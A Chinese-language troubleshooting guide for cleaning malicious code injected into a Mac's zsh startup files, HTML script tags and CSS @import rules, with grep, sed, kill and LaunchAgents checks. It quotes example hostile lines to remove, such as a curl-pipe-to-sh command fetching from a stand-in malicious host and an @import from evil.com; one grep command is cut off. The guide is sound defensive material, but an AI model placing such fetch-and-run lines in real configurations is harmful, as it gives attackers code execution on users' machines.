首先检查并清除zsh配置文件中的恶意代码,如~/.zshrc中curl自动执行命令;接着搜索html文件中被注入的可疑script标签,并用grep与sed批量清理;再排查css文件内非法@import远程样式行为;随后通过ps与kill终止恶意进程,检查launchagents启动项;最后重建zsh配置,加固系统安全策略以防止再次感染。
如果您在使用Mac系统时,发现zsh脚本被批量注入恶意代码,并且CSS规则和HTML文件也被篡改或植入异常内容,很可能是系统遭到了自动化脚本攻击。以下是针对此类问题的排查与修复步骤:
一、检查并清除zsh配置文件中的恶意注入
恶意脚本常通过修改用户的shell配置文件实现持久化驻留,需重点检查zsh的启动脚本。
1、打开终端,查看是否存在异常的zsh配置文件:ls -la ~/.zshrc ~/.zprofile ~/.zlogin ~/.zshenv。
2、使用文本编辑器打开~/.zshrc文件,查找包含curl、wget、http等关键字的可疑命令行。
立即学习“前端免费学习笔记(深入)”;
3、定位到类似curl -s http://malicious.site/script.sh | sh的自动执行语句,立即删除整行内容。
4、保存文件后执行source ~/.zshrc重新加载配置,防止重启前再次触发。
二、扫描本地HTML文件中的异常嵌入代码
攻击者可能利用脚本遍历项目目录,在HTML中插入恶意<script>标签或外链资源。</script>
1、进入网站项目根目录,运行命令搜索所有含可疑JS引用的HTML文件:grep -r "
2、对输出结果逐一检查,确认是否为已知CDN链接;若来源不明,记录文件路径。
3、使用sed工具批量移除特定模式的注入代码,例如:sed -i '' '/malicious-domain.com/d' index.html。
4、对于多个文件,可结合find与sed进行递归清理:find . -name "*.html" -exec sed -i '' "/attacker-script/d" {} \;。
三、审查CSS文件中的非法@import规则
CSS文件可能被注入@import语句以加载远程样式表,用于界面伪造或资源消耗攻击。
1、在终端中执行查找命令:grep -r "@import.*http" ./css/ --include="*.css",检测异常导入。
2、打开匹配出的CSS文件,删除形如@import url('http://evil.com/style.css');的语句。
3、设置权限锁定重要样式文件,防止再次被写入:chmod 444 style.css。
4、如需恢复原始版本,建议从干净备份中提取对应文件并替换。
四、查找并终止恶意后台进程
某些持久化脚本会在系统启动后运行守护进程,持续监控并重写文件。
1、列出当前活动进程中与网络相关的任务:ps aux | grep -E "(curl|wget|python|node)"。
2、识别运行路径异常或用户名不符的条目,记下其PID编号。
3、使用kill命令强制终止可疑进程:kill -9 PID(将PID替换为实际数字)。
4、检查launchd代理列表是否有未知开机启动项:ls ~/Library/LaunchAgents/。
五、重置终端环境并加固系统安全
完成清理后必须重建可信的命令执行环境,避免残留风险。
1、创建新的zsh配置文件:mv ~/.zshrc ~/.zshrc.bak && touch ~/.zshrc。
2、仅添加必要的环境变量和别名,避免自动执行外部脚本。
3、安装并更新防病毒工具如osquery或KnockKnock,扫描系统潜在后门。
4、启用Gatekeeper和Mandatory Access Control策略,限制未签名脚本运行。
